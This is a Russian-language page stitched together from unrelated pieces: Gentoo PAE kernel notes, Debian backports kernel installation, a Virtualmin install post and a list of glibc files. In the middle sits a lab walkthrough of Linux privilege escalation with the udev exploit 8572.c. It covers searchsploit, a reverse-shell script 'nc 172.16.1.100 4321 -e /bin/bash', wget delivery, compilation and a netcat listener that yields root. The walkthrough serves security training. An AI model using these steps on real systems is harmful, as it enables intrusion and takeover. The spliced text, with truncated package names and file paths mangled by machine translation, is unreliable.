I686 debian: LinuxMint Debian Edition (MATE) by Lazarus i686 (1xDVD) скачать торрент
Заметки им.Ibice: Gentoo i686 и PAE
На днях при сборке Chromium столкнулся со странной проблемой: на моей машине с 9Гб оперативной памяти как-то не хватило 3Гб свободных ресурсов для быстрой сборки пакета. После проверки через free мои опасения подтвердились: моя система действительно работает только с третью оперативной памяти. Причина тому нашлась достаточно быстро: дело в том, что при начальной сборке Gentoo я выбрал носитель, который вообще у нас предназначался для VPS. Конечно же, на VPS с 1Гб оперативной памяти это замечательный вариант, но вот для рабочей машины, наверное, все-таки лучшим вариантом был бы x86_64. Так или иначе, новую установку делать было уже некогда, но я вспомнил Debian, где на i686 поддерживается и большее количество памяти, чем 3Гб.
Причиной тому в Debian’е использование PAE. Если кратко, то этот механизм позволяет использовать объемы памяти, свойственные 64-битным системам, на системе 32-битной. Включается PAE на Gentoo достаточно легко и никаких проблем после этого не наблюдается, однако придется пересобирать ядро. Прежде всего, давайте отметим те параметры ядра, которые нужно заменить:
CONFIG_X86_PAE=y
CONFIG_X86_32=y
CONFIG_HIGHMEM4G=n
CONFIG_HIGHMEM64G=y
Люди пишут также, что нужно установить в «n» и параметр «CONFIG_M686», однако у меня и без этого все отлично заработало. Есть два варианта изменить эти параметры и пересобрать с ними ядро Linux:
1. Выгрузка текущих параметров ядра в файл и его последующая корректировка,
2. Корректировка параметров непосредственно во время работы genkernel, запущенного с параметром «—menuconfig».
Для начала рассмотрим первый вариант.
1.1. Выгружаем параметры ядра в файл «/root/kernel.config»:
zcat /proc/config.gz > /root/kernel.config
1.2. Редактируем полученный файл в более привычном и удобном текстовом редакторе (можно и в графическом, но только чтобы не добавлялся BOM и не менялась кодировка):
nano /root/kernel.config
Обратите внимание, что некоторые параметры могут быть закомментированы и к ним в таком случае будет прибавлено «is not set» в конце строки. В таком случае убираем диез, а «is not set» меняем на «=y/=n». Кстати, параметры, которые должны иметь отрицательное значение все-таки тоже обязательно объявлять, так как отсутствие явного включения не означает того, что параметр при сборке будет отключен.
1.3. Сохраняем параметры и запускаем пересборку ядра:
genkernel --kernel-config=/root/kernel.config all
На данном этапе многие (посмотрите форумы и будете удивлены) теряются и используют вместо «—kernel-config» просто «—config». Объясняю: первый вариант передает сборщику параметры сборки ядра, второй же — параметры самого сборщика, которые нам менять не нужно. Когда мы передаем в параметре «—config» настройки ядра, genkernel просто падает, что некоторые воспринимают как баг, хотя это вовсе не так.
1.4. Не забываем после завершения работы genkernel обновить и зависимые от ядра модули:
emerge --ask @module-rebuild
Без этого после перезагрузки у вас может отвалиться видеокарта, звук или сеть.
1.5. Перезагружаем машину и если что-то пошло не так (у меня, к примеру, начинает мигать экран на этапе запуска X11 и авторизоваться не выходит в консоли) выбираем при загрузке в grub’е другие параметры, а затем «Recovery mode», после чего получаем доступ в полноценную консоль и исправляем допущенные ошибки.
Второй способ немного проще, но для того, чтобы им пользоваться, нужно хорошо ориентироваться в меню.
2.1. Выгружаем параметры ядра в файл «/usr/src/linux/.config»:
zcat /proc/config.gz > /usr/src/linux/.config
2.2. Вызываем genkernel с меню функций ядра:
genkernel --menuconfig all
2.3. По умолчанию подгружается наш «/usr/src/linux/.config». Ищем нужные параметры и меняем их значение (если не можете что-то найти, жмите на «/» и вводите название параметра без «CONFIG_». Напрямую вы никуда не попадете, но программа покажет вам схематически где нужно искать.
2.4. После редактирования настроек необходимо сохранить полученный файл, причем в качестве пути для сохранения необходимо указывать просто «.config». Если сохранить настройки куда-то в другое место, то пересборка не будет иметь смысла, так как произойдет с теми же параметрами, которые в вашем ядре итак есть.
2.5. По аналогии с первым способом пересобираем зависимые от ядра модули:
emerge --ask @module-rebuild
После перезагрузки выполняем «free» и любуемся на полностью доступный объем виртуальной памяти. Если после этого ничего не изменилось, посмотрите, с какими параметрами в настоящий момент собрано ядро и убедитесь в том, что настройки были изменены. Если все правильно, то обратите внимание на объем памяти при запуске компьютера. Если там столько же, сколько и в Linux’е, то смотреть нужно уже в аппаратную сторону: быть может, некоторые модули неисправны, а кроме этого некоторые материнские платы сами по себе пе поддерживают крупные объемы оперативной памяти (сверьтесь с руководством к вашей материнской плате).
Установка ядра 3.2 на Debian Squeeze
Разработчики Debian, а конкретно те, кто отвечает за проект backports, иной раз решили нас порадовать, выпустив ядро 3.2.0 в своем репозитарии. Итак, поехали.
Если в Ваш sources.list не добавлен репозитарий Backports – то самое время это сделать:
# echo “deb http://backports.debian.org/debian-backports squeeze-backports main” >> /etc/apt/sources.list
Обновляем кеш репозитариев. Для исключения разного рода проблем рекомендую перед установкой ядра проапгрейдить систему.
# aptitude update && aptitude -y upgrade
Ищем новое ядрышко, для того, что бы выбрать нужное под Вашу архитектуру:
# aptitude search linux-image-3
В нашем распоряжении:
linux-image-3.2.0-0.bpo.1-486
linux-image-3.2.0-0.bpo.1-686-pae
linux-image-3.2.0-0.bpo.1-686-pae-dbg
linux-image-3.2.0-0.bpo.1-amd64
linux-image-3.2.0-0.bpo.2-486
linux-image-3.2.0-0.bpo.2-686-pae
linux-image-3.2.0-0.bpo.2-686-pae-dbg
linux-image-3.2.0-0.bpo.2-amd64
linux-image-3.2.0-0.bpo.2-rt-686-pae
linux-image-3.2.0-0.bpo.2-rt-686-pae-dbg
Выбираем необходимое нам ядро, исходя из архитектуры вашего ПК выберите нужное Вам ядро. Мне подошло 3.2.0-0.bpo.2-686-pae. Приставка -pae означает платформу x86, но которая при этом поддерживает более 4 гб оперативной памяти. Устанавливаем ядро. Будьте внимательны с зависимостями!
# aptitude install linux-image-3.2.0-0.bpo.2-686-pae
Aptitude предупредит нас о том, что необходимо решить зависимости. Поскольку, пакеты initramfs-tools и linux-base старой версии, то их необходимо подтянуть из Backports. При первом запросе отказываемся от установки ядра со старыми версиями пакетов, нажав “n”
Следующие НОВЫЕ пакеты будут установлены: libc6-i686{a} linux-image-3.2.0-0.bpo.2-686-pae{b} 0 пакетов обновлено, 2 установлено новых, 0 пакетов отмечено для удаления, и 0 пакетов не обновлено. Необходимо получить 24,1 MB архивов. После распаковки 92,7 MB будет занято. Следующие пакеты имеют неудовлетворённые зависимости: linux-image-3.2.0-0.bpo.2-686-pae: Зависит: linux-base (>= 3~) но установлен 2.6.32-41squeeze2 Ломает: initramfs-tools (< 0.99~) но установлен 0.98.8 Следующие действия разрешат зависимости: Сохранить для следующих пакетов их текущие версии: 1) linux-image-3.2.0-0.bpo.2-686-pae [Не установлен] Принять данное решение? [Y/n/q/?] n
Далее Aptitude предложит нам обновить эти два пакета непосредственно из Backports, с чем мы и соглашаемся:
Следующие действия разрешат зависимости: Обновить следующие пакеты: 1) initramfs-tools [0.98.8 (now, stable) -> 0.99~bpo60+1 (squeeze-backports)] 2) linux-base [2.6.32-41squeeze2 (now, stable) -> 3.4~bpo60+1 (squeeze-backports)] Принять данное решение? [Y/n/q/?] Y
Ну, тут понятное дело, тоже соглашаемся.
Следующие НОВЫЕ пакеты будут установлены: libc6-i686{a} linux-image-3.2.0-0.bpo.2-686-pae Следующие пакеты будут обновлены: initramfs-tools linux-base 2 пакетов обновлено, 2 установлено новых, 0 пакетов отмечено для удаления, и 0 пакетов не обновлено. Необходимо получить 24,2 MB архивов. После распаковки 92,5 MB будет занято. Хотите продолжить? [Y/n/?] Y
Перезагружаемся, наслаждаемся новым ядром. Стоит учесть, что для нового ядра отсутствует nvidia-kernel, virtualbox и еще некоторые модули для ядра. Однако, если вы используете драйвера vesa, или хотите обновить ядрышко для сервера – то ничего страшного не произойдет. Если после установки возникли проблемы с видеодрайверами – удалите, а еще лучше переименуйте xorg.conf.
Удачи! 🙂
Обновление ядра Debian — Карманные записки Системного Инженера — LiveJournal
Теперь выполняем поиск доступных для установки пакетов, содержащих ядро Debian. Обратите внимание на листинг ниже. Вначале идут пакеты из stable репозитроия, затем backports с буквенным индексом bpo.
# apt-cache search linux-image
linux-headers-3.16.0-4-586 — Header files for Linux 3.16.0-4-586
linux-headers-3.16.0-4-686-pae — Header files for Linux 3.16.0-4-686-pae
linux-headers-3.16.0-4-amd64 — Header files for Linux 3.16.0-4-amd64
linux-image-3.16.0-4-586 — Linux 3.16 for older PCs
linux-image-3.16.0-4-686-pae — Linux 3.16 for modern PCs
linux-image-3.16.0-4-686-pae-dbg — Debugging symbols for Linux 3.16.0-4-686-pae
linux-image-3.16.0-4-amd64 — Linux 3.16 for 64-bit PCs
linux-image-3.16.0-4-amd64-dbg — Debugging symbols for Linux 3.16.0-4-amd64
linux-image-486 — Linux for older PCs (dummy package)
linux-image-586 — Linux for older PCs (meta-package)
linux-image-686-pae — Linux for modern PCs (meta-package)
linux-image-686-pae-dbg — Debugging symbols for Linux 686-pae configuration (meta-package)
linux-image-amd64 — Linux for 64-bit PCs (meta-package)
linux-image-amd64-dbg — Debugging symbols for Linux amd64 configuration (meta-package)
nvidia-kernel-3.16.0-4-586 — NVIDIA binary kernel module for Linux 3.16.0-4-586
nvidia-kernel-3.16.0-4-686-pae — NVIDIA binary kernel module for Linux 3.16.0-4-686-pae
nvidia-kernel-3.16.0-4-amd64 — NVIDIA binary kernel module for Linux 3.16.0-4-amd64
linux-headers-4.9.0-0.bpo.2-686 — Header files for Linux 4.9.0-0.bpo.2-686
linux-headers-4.9.0-0.bpo.2-686-pae — Header files for Linux 4.9.0-0.bpo.2-686-pae
linux-headers-4.9.0-0.bpo.2-amd64 — Header files for Linux 4.9.0-0.bpo.2-amd64
linux-headers-4.9.0-0.bpo.2-rt-686-pae — Header files for Linux 4.9.0-0.bpo.2-rt-686-pae
linux-headers-4.9.0-0.bpo.2-rt-amd64 — Header files for Linux 4.9.0-0.bpo.2-rt-amd64
linux-image-4.9.0-0.bpo.2-686-pae-dbg — Debugging symbols for Linux 4.9.0-0.bpo.2-686-pae
linux-image-4.9.0-0.bpo.2-686-pae-unsign
linux-image-4.9.0-0.bpo.2-686-unsigned — Linux 4.9 for older PCs
linux-image-4.9.0-0.bpo.2-amd64-dbg — Debugging symbols for Linux 4.9.0-0.bpo.2-amd64
linux-image-4.9.0-0.bpo.2-amd64-unsigned — Linux 4.9 for 64-bit PCs
linux-image-4.9.0-0.bpo.2-rt-686-pae-dbg — Debugging symbols for Linux 4.9.0-0.bpo.2-rt-686-pae
linux-image-4.9.0-0.bpo.2-rt-686-pae-uns
linux-image-4.9.0-0.bpo.2-rt-amd64-dbg — Debugging symbols for Linux 4.9.0-0.bpo.2-rt-amd64
linux-image-4.9.0-0.bpo.2-rt-amd64-unsig
linux-headers-4.6.0-1-grsec-686-pae — Header files for Linux 4.6.0-1-grsec-686-pae
linux-headers-4.9.0-2-grsec-686-pae — Header files for Linux 4.9.0-2-grsec-686-pae
linux-headers-4.9.0-2-grsec-amd64 — Header files for Linux 4.9.0-2-grsec-amd64
linux-image-4.6.0-1-grsec-686-pae — Linux 4.6 for modern PCs, Grsecurity protection
linux-image-4.9.0-2-grsec-686-pae — Linux 4.9 for modern PCs, Grsecurity protection
linux-image-4.9.0-2-grsec-amd64 — Linux 4.9 for 64-bit PCs, Grsecurity protection
linux-image-grsec-686-pae — Linux image meta-package, grsec featureset
linux-image-grsec-amd64 — Linux image meta-package, grsec featureset
linux-image-grsec-i386 — Linux image meta-package, grsec featureset (transition package)
linux-image-686 — Linux for older PCs (meta-package)
linux-image-rt-686-pae — Linux for modern PCs (meta-package), PREEMPT_RT
linux-image-rt-686-pae-dbg — Debugging symbols for Linux rt-686-pae configuration (meta-package)
linux-image-rt-amd64 — Linux for 64-bit PCs (meta-package), PREEMPT_RT
linux-image-rt-amd64-dbg — Debugging symbols for Linux rt-amd64 configuration (meta-package)
linux-image-4.9.0-0.bpo.2-686 — Linux 4.9 for older PCs (signed)
linux-image-4.9.0-0.bpo.2-686-pae — Linux 4.9 for modern PCs (signed)
linux-image-4.9.0-0.bpo.2-amd64 — Linux 4.9 for 64-bit PCs (signed)
linux-image-4.9.0-0.bpo.2-rt-686-pae — Linux 4.9 for modern PCs, PREEMPT_RT (signed)
linux-image-4.9.0-0.bpo.2-rt-amd64 — Linux 4.9 for 64-bit PCs, PREEMPT_RT (signed)
Т.к. у нас уже стоит самое свежее ядро из стабильной ветки, его установку делать мы не будем, иначе
apt-get install linux-image-3.16.0-4-amd64
Ставим свежее ядро из блэкпортов. В результате поиска нас интересуют эти строки
apt-get install -t jessie-backports linux-image-4.9.0-0.bpo.2-a
apt-get install -t jessie-backports linux-headers-4.9.0-0.bpo.2-amd64
После обновления ядра Debian необходимо перезагрузить систему. Чтобы проверить версию ядра и просмотреть лог ошибок выполните команды ниже:
Расширение локальных привилегий в Linux при помощи эксплоита для ядра
Расширение локальных привилегий в Linux при помощи эксплоита для ядра
Получение прав суперпользователя сродни Граалю для специалистов, занимающихся эксплуатацией уязвимостей в Linux.
Автор: drd_
Получение прав суперпользователя сродни Граалю для специалистов, занимающихся эксплуатацией уязвимостей в Linux. Так же как и системная учетная запись в Windows, в Linux аккаунт root дает полный административный доступ к операционной системе. Однако иногда даже при помощи эксплоита, который сработал успешно, мы получаем низкоуровневый шелл, и нужно нечто, позволяющее расширить полномочия, для получения доступа к более привилегированным аккаунтам и полного контроля над целевой системой.
Шаг 1: Сбор информации и поиск эксплоита
После того как получен низкоуровневый шелл в целевой системе, наша цель – расширение привилегий, права суперпользователя и полный доступ к системе.
В этой статье будет рассмотрено решение этой задачи при помощи эксплоита для ядра. Поскольку у нас уже есть шелл, воспользуемся командой uname –a для получения первоначальной информации о системе. Кроме того, команда lsb_release –a также может оказаться полезной для выяснения дистрибутива и сведений о релизе.
[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (36 bytes) to 172.16.1.102
[*] Command shell session 2 opened (172.16.1.100:4444 -> 172.16.1.102:49499) at 2018-07-16 13:55:15 -0500
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
lsb_release -a
No LSB modeuls are available.
Distributor ID: Ubuntu
Description: Ubuntu 8.04
Release: 8.04
Codename: hardy
Мы выяснили, что система работает на базе Ubuntu 8.04 с ядром 2.6.24, и теперь приступаем к поиску эксплоита. В Kali есть локальная версия сайта Exploit-DB, представляющая собой базу данных, которая содержит эксплоиты, код и публикации. Поиск по базе осуществляется прямо из терминала при помощи команды searchsploit:
root@nullbyte:~# searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23 | exploits/linux_x86/local/42276.c
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escala | exploits/linux/local/160.c
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Es | exploits/linux/local/22362.c
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Es | exploits/linux/local/22363.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Pr | exploits/linux/local/9844.py
Linux Kernel 2.4.32/2.6.0 - 'do_mremap()' Bound Checking Privilege E | exploits/linux/local/145.c
Linux Kernel 2.4.30/2.6.11.5 - Bluetooth 'bluez_sock_create' Local P | exploits/linux/local/25289.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local | exploits/linux/local/19933.rb
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / REHL 4.8/5.3 / SuSE 10 SP | exploits/linux/local/9545.c
Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Pri | exploits/linux/local/926.c
Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3) | exploits/linux/local/895.c
Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Privilege E | exploits/linux/local/25288.c
Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege | exploits/linux/local/9598.txt
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox | exploits/linux/local/9479.c
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Esca | exploits/linux_x86-64/local/4460.c
Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation | exploits/linux/local/9641.txt
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local | exploits/linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9/04) UDEV < 1.4.1 - Local Pr | exploits/linux/local/8572.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Cor | exploits/linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1 | exploits/linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation | exploits/linux/local/40812.c
Поскольку мы ищем эксплоит для расширения привилегий, то используем ключевое слово privilege, а затем уточняем результаты поиска при помощи утилиты grep (флаг –i говорит о том, что не нужно учитывать регистр). Например, мы можем воспользоваться эксплоитом 8572.c, который эксплуатирует брешь в менеджере устройств UDEV и позволяет выполнять код через непроверенные сообщения в сокетах Netlink. Просто копируем путь к эксплоиту и при помощи команды locate выясняем полный путь:
root@nullbyte:~# locate linux/local/8572.c
/usr/share/exploitdb/exploits/linux/local/8572.c
root@nullbyte:~#
Как вы могли догадаться, эксплоит написан на С, однако мы не будем углубляться в дебри, а просто скомпилируем исходник. Хотя если вы знакомы с языком С, будет совсем не лишним ознакомиться с логикой работы эксплоита. Чтобы получить базовое представление о том, чем мы будем пользоваться, при помощи команды cat заглянем вовнутрь файла и посмотрим комментарии:
* cve-2009-1185.c
*
* udev < 1141 Local Privilege Escalation Exploit
* Jon Oberheide <[email protected]>
*
http://
jon.
oberheide.
org
*
* Информация:
*
*
http://
cvemitre.
org/
cgi-
bin/
cvename.
cgi?
name=
CVE-2009-1185
*
*
udev до версии 1.4.1 не проверяет, приходит ли
NETLINK-сообщение из
* пространства ядра, что позволяет локальным аккаунтам расширять
* привилегии при помощи отсылки
NETLINK-сообщения из пространства
* пользователя
*
* Примечание:
*
* Этот эксплоит является альтернативной версией эксплоита от
kcope,
* использует правила 95-
udev-
late.
rules и позволяет запускать произвольные
* команды при удалении устройства. Более чистый и надежный код при условии,
* что в вашем дистрибутиве есть вышеуказанный файл с правилами.
*
* Протестирован в
Gentoo,
Intrepid и
Jaunty.
*
* Использование:
*
* Необходимо передать
PID, прикрепленный к сокетам
netlink менеджера
udevd
* указан в /
proc/
net/
netlink и обычно равен
udevd
PID минус 1), в
* качестве аргумента
argv[1].
*
* Эксплоит запускает /
tmp/
run от имени суперпользователя, и вы можете
* передать в ту команду любую полезную нагрузку.
Шаг 2: Доставка эксплоита в целевую систему
Для начала эксплоит нужно скопировать на целевую машину. Самый простой способ решить эту задачу – настроить локальный веб-сервер (например, Apache), подключиться к этому серверу с целевой системы и загрузить файл. Однако вначале нужно выполнить подготовительную работу.
Во-первых, убедитесь, что сервер поднят и работает в Kali. В терминале запустите команду service apache2 restart. Затем нужно создать символическую ссылку между директорией, где хранится и эксплоит и папкой с файлами сервера, при помощи следующей команды:
ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html/
Теперь наш эксплоит доступен для загрузки.
В целевой системе эксплоит будет запускаться из директории /tmp, и нам нужно вначале создать исполняемый файл. В Kali введите команду nano /var/www/html/run и добавьте следующие строки:
#! /bin/bash
nc 172.16.1.100 4321 -e /bin/bash
После запуска этого файла для подключения и организации шелла к системе, в которой работает Kali, через IP-адрес и порт 4321, будет использоваться Netcat. Нажмите Ctrl-X, затем Y и далее клавишу Enter для сохранения файла.
Теперь мы готовы к загрузке файлов на целевую машину. Используя полученный ранее низкоуровневый шелл, переходим в директорию /tmp, при помощи утилиты wget подключаемся к веб-серверу, на котором установлен Kali, и загружаем файлы все необходимые файлы.
cd /tmp
wget http://172.16.1.100/run
--15:18:31-- http://172.16.1.100/run
=> 'run'
Connecting to 172.16.1.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46
OK 100% 978.43 KB/s
15:18:31 (978.43 KB/s) - 'run' saved [46/46]
wget http://172.16.1.100/local/8752.c
--15:19:24-- http://172.16.1.100/local/8572.c
=> '8572.c'
Connecting to 172.16.1.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,876 (2.8K) [text/x-csrc]
OK 100% 100.46 MB/s
15:19:24 (100.46 MB/s) - '8572.c' saved [2876/2876]
Шаг 3: Компиляция и запуск эксплоита
Когда все файлы, необходимые для запуска эксплоита, оказались в целевой системе, остался последний шаг – компиляция исходника. Мы не будем погружаться в дебри программирования, но, если коротко – исполняемый файл должен быть собран из исходного текста. В нашем случае компиляция будет осуществляться при помощи GCC (GNU Compiler Collection; Набор компиляторов проекта GNU).
Для компиляции файла 8572.c используйте следующую команду (флаг –o задает имя конечного исполняемого файла):
gcc
-
o
exploit
8572.
c
Если в процессе компиляции не будет найден динамический линковщик, воспользуйтесь флагом –B для указания директории, где находится ld:
gcc -B /usr/bin -o exploit 8572.c
После компиляции при помощи команды ls проверяем, что исполняемый файл появился.
gcc -o exploit 8572.c
collect2: cannont find 'ld'
gcc -B /usr/bin -o exploit 8572.c
ls
4674.jsvc_up
8572.c
exploit
jVswA
mhbkk
run
В комментариях файла 8572.c говорилось, что нам нужно найти PID (идентификатор процесса) сокета Netlink, который обычно равен идентификатору процесса UDEVD минус 1. Запускаем команду cat /proc/net/netlink и ищем ненулевой идентификатор. Проверяем найденное значение при помощи команды ps aux | grep udev. Идентификатор процесса UDEVB должен быть на единицу больше.
cat /
proc/
net/
netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
celb4800 0 0 00000000 0 0 00000000 2
cf87fa00 4 0 00000000 0 0 00000000 2
cd678000 7 0 00000000 0 0 00000000 2
cdc4bc00 9 0 00000000 0 0 00000000 2
cdc09c00 10 0 00000000 0 0 00000000 2
ce1bc400 15 0 00000000 0 0 00000000 2
cf8dee00 15 2459 00000000 0 0 00000000 2
cd394800 16 0 00000000 0 0 00000000 2
cd5f6200 18 0 00000000 0 0 00000000 2
ps
aux |
grep
udev
root 2460 0.0 0.2 2216 648 ?
S<
s 14:42 0:01 /
sbinudevd --
daemon
Затем нужно настроить слушатель на машине с Kali, с которым будет устанавливаться соединение после запуска скрипта run на целевой системе. На машине с Kali введите команду nc -lvp 4321, после чего начнут отслеживаться входящие подключения.
После настройки слушателя, можно приступать к запуску эксплоита. Вспоминаем, что нужно передать PID сокета Netlink в качестве аргумента, который в нашем случае равен 2459 (у вас это значение может отличаться). Выполняем следующую команду в непривилегированном шелле:
./
exploit 2459
Через некоторое время должно появиться подключение к нашему слушателю, и мы сможем запускать разные команды, как, например, id и whoami для просмотра информации о пользователе. Далее становится понятно, что у нас появился доступ с правами суперпользователя, и мы можем выполнять любые операции в целевой системе.
root@nullbyte:~# nc -lvp 4321
listening on [any] 4321 ...
172.16.1.102: inverse host lookup failed: Unknown host
connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 34418
id
uid=0(root) gid=0(root)
whoami
root
Установка на Debian i686 | Virtualmin
Хорошо,
После нескольких перестроек коробки, запуска установки и анализа ошибок при установке я обнаружил несколько проблем.
Я проделал следующий сложный / трудный способ, возможно, есть более простой способ, но я его не знаю.
Проблема с установкой заключалась в попытке установить поврежденный / устаревший Debian webmin, который несовместим с Virtualmin.
Я обошел это, отключив все источники в моем файле исходных кодов apt перед запуском сценария установки.
Для этого потребовалось сначала установить все зависимости из репозиториев debian. Это
apt-get install sasl2-bin libsasl2-modules-sql libsasl2-modules libsasl2-krb4-mit libapache2-svn apache2-common scponly libapache2-mod-fcgid clamav-testfiles clamav-docs clamav-freshclav-daemon clamav clamav clamats libcrypt-ssleay-perl proftpd-doc proftpd-common proftpd dovecot-pop3d dovecot-imapd dovecot-common php4 webalizer awstats php4-pgsql postgresql-client postgresql php4-riql mysql-common mysql-client-common mysql server-common mysql-common mysql-common mysql server-common mysql-common mysql server irb ruby subversion mailman python iptables quota libdbd-mysql-perl libdbd-pg-perl libpg-perl procmail spamc spamassassin bind9 libio-pty-perl libmd5-perl
после завершения я прокомментировал все источники из моего файла исходных кодов apt и запустил
apt-get clean; apt-get update
Затем я запустил установку.sh, и у меня, кажется, есть полностью рабочая конфигурация webmin / virtualmin.
Я попробую запустить все это еще раз при новой установке, чтобы убедиться, что я ничего не пропустил.
Я изменил следующую строку (623) с
apt-get -y —purge remove webmin-base apache
на
apt-get -y —purge remove webmin apache
Не уверен, что это помогло.
Строка 651 вызвала у меня некоторые проблемы, так как она не работает, если нет необходимости устанавливать какие-либо зависимости, т.е. предыдущая установка не удалась.Возможно, стоит упомянуть об этом в сообщении об ошибке.
.
/etc/ld.so.conf.d/i386-linux-gnu.conf |
/lib/ld-linux.so.2 |
/lib/i386-linux-gnu/ld-2.28.so |
/lib/i386-linux-gnu/ld-linux.so.2 |
/lib/i386-linux-gnu/libBrokenLocale-2.28.so |
/lib/i386-linux-gnu/libBrokenLocale.so.1 |
/lib/i386-linux-gnu/libSegFault.so |
/ lib / i386-linux-gnu / libanl-2.28.so |
/lib/i386-linux-gnu/libanl.so.1 |
/lib/i386-linux-gnu/libc-2.28.so |
/lib/i386-linux-gnu/libc.so.6 |
/lib/i386-linux-gnu/libcrypt-2.28.so |
/lib/i386-linux-gnu/libcrypt.so.1 |
/lib/i386-linux-gnu/libdl-2.28.so |
/lib/i386-linux-gnu/libdl.so.2 |
/lib/i386-linux-gnu/libm-2.28.so |
/ библиотека / i386-linux-gnu / libm.так.6 |
/lib/i386-linux-gnu/libmemusage.so |
/lib/i386-linux-gnu/libnsl-2.28.so |
/lib/i386-linux-gnu/libnsl.so.1 |
/lib/i386-linux-gnu/libnss_compat-2.28.so |
/lib/i386-linux-gnu/libnss_compat.so.2 |
/lib/i386-linux-gnu/libnss_dns-2.28.so |
/lib/i386-linux-gnu/libnss_dns.so.2 |
/ lib / i386-linux-gnu / libnss_files-2.28.so |
/lib/i386-linux-gnu/libnss_files.so.2 |
/lib/i386-linux-gnu/libnss_hesiod-2.28.so |
/lib/i386-linux-gnu/libnss_hesiod.so.2 |
/lib/i386-linux-gnu/libnss_nis-2.28.so |
/lib/i386-linux-gnu/libnss_nis.so.2 |
/lib/i386-linux-gnu/libnss_nisplus-2.28.so |
/lib/i386-linux-gnu/libnss_nisplus.so.2 |
/ lib / i386-linux-gnu / libpcprofile.так |
/lib/i386-linux-gnu/libpthread-2.28.so |
/lib/i386-linux-gnu/libpthread.so.0 |
/lib/i386-linux-gnu/libresolv-2.28.so |
/lib/i386-linux-gnu/libresolv.so.2 |
/lib/i386-linux-gnu/librt-2.28.so |
/lib/i386-linux-gnu/librt.so.1 |
/lib/i386-linux-gnu/libthread_db-1.0.so |
/ lib / i386-linux-gnu / libthread_db.так.1 |
/lib/i386-linux-gnu/libutil-2.28.so |
/lib/i386-linux-gnu/libutil.so.1 |
/usr/lib/i386-linux-gnu/audit/sotruss-lib.so |
/usr/lib/i386-linux-gnu/gconv/ANSI_X3.110.so |
/usr/lib/i386-linux-gnu/gconv/ARMSCII-8.so |
/usr/lib/i386-linux-gnu/gconv/ASMO_449.so |
/usr/lib/i386-linux-gnu/gconv/BIG5.so |
/ usr / lib / i386-linux-gnu / gconv / BIG5HKSCS.так |
/usr/lib/i386-linux-gnu/gconv/BRF.so |
/usr/lib/i386-linux-gnu/gconv/CP10007.so |
/usr/lib/i386-linux-gnu/gconv/CP1125.so |
/usr/lib/i386-linux-gnu/gconv/CP1250.so |
/usr/lib/i386-linux-gnu/gconv/CP1251.so |
/usr/lib/i386-linux-gnu/gconv/CP1252.so |
/usr/lib/i386-linux-gnu/gconv/CP1253.so |
/ usr / lib / i386-linux-gnu / gconv / CP1254.так |
/usr/lib/i386-linux-gnu/gconv/CP1255.so |
/usr/lib/i386-linux-gnu/gconv/CP1256.so |
/usr/lib/i386-linux-gnu/gconv/CP1257.so |
/usr/lib/i386-linux-gnu/gconv/CP1258.so |
/usr/lib/i386-linux-gnu/gconv/CP737.so |
/usr/lib/i386-linux-gnu/gconv/CP770.so |
/usr/lib/i386-linux-gnu/gconv/CP771.so |
/ usr / lib / i386-linux-gnu / gconv / CP772.так |
/usr/lib/i386-linux-gnu/gconv/CP773.so |
/usr/lib/i386-linux-gnu/gconv/CP774.so |
/usr/lib/i386-linux-gnu/gconv/CP775.so |
/usr/lib/i386-linux-gnu/gconv/CP932.so |
/usr/lib/i386-linux-gnu/gconv/CSN_369103.so |
/usr/lib/i386-linux-gnu/gconv/CWI.so |
/usr/lib/i386-linux-gnu/gconv/DEC-MCS.so |
/ usr / lib / i386-linux-gnu / gconv / EBCDIC-AT-DE-A.так |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-AT-DE.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-CA-FR.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-DK-NO-A.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-DK-NO.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-ES-A.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-ES-S.so |
/ usr / lib / i386-linux-gnu / gconv / EBCDIC-ES.так |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-FI-SE-A.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-FI-SE.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-FR.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-IS-FRISS.so |
/usr/lib/i386-linux-gnu/gconv/EBCDIC-IT.so |
